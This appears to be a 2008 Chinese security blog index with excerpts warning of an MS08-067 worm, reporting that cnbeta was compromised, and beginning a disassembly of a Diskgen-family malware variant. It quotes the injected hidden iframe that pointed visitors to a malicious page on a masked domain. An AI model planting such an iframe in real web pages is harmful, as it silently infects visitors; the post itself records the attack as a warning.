挂马无处不在

附图：截取时间2008－11－16 21：03

最近发现有些人反映上网一段时间后 出现svchost.exe的错误，提示信息类似“svchost.exe应用程序错误“0x7ffa0eb8"指令引用的"0x7ffa0eb8"内存.该内存不能为written” 之后便不能上网

打了之前的几个“波”的补丁均无效，因此怀疑利用MS08-067漏洞的蠕虫已经出现，各位务必即时打好补丁！

关于该补丁的介绍可以参考

作者：清新阳光                                                            (

2008年6月8日晚20时左右发现cnbeta被挂马 在网页前面加入了如下代码：

<iframe src=http://www.******.info/hao4.htm width=100 height=1></iframe>    

请注意，暂时不要访问cnbeta~

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

昨天花了一晚上时间跟踪了磁碟机的新变种的主程序（setup.exe) 发现了原先没有发现的一些东西，做个笔记吧~~汇编刚开始学，还希望大牛们指导指导哈^_^

这里只写出原来没有分析出来的部分~~

00402111 |> /8D85 E4FEFFFF /LEA EAX,DWORD PTR SS:[EBP-11C]
00402117 |. |8D4D F0       |LEA ECX,DWORD PTR SS:[EBP-10]
0040211A |. |50            |PUSH EAX
0040211B |. |E8 32680000

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (

作者：清新阳光                                                            (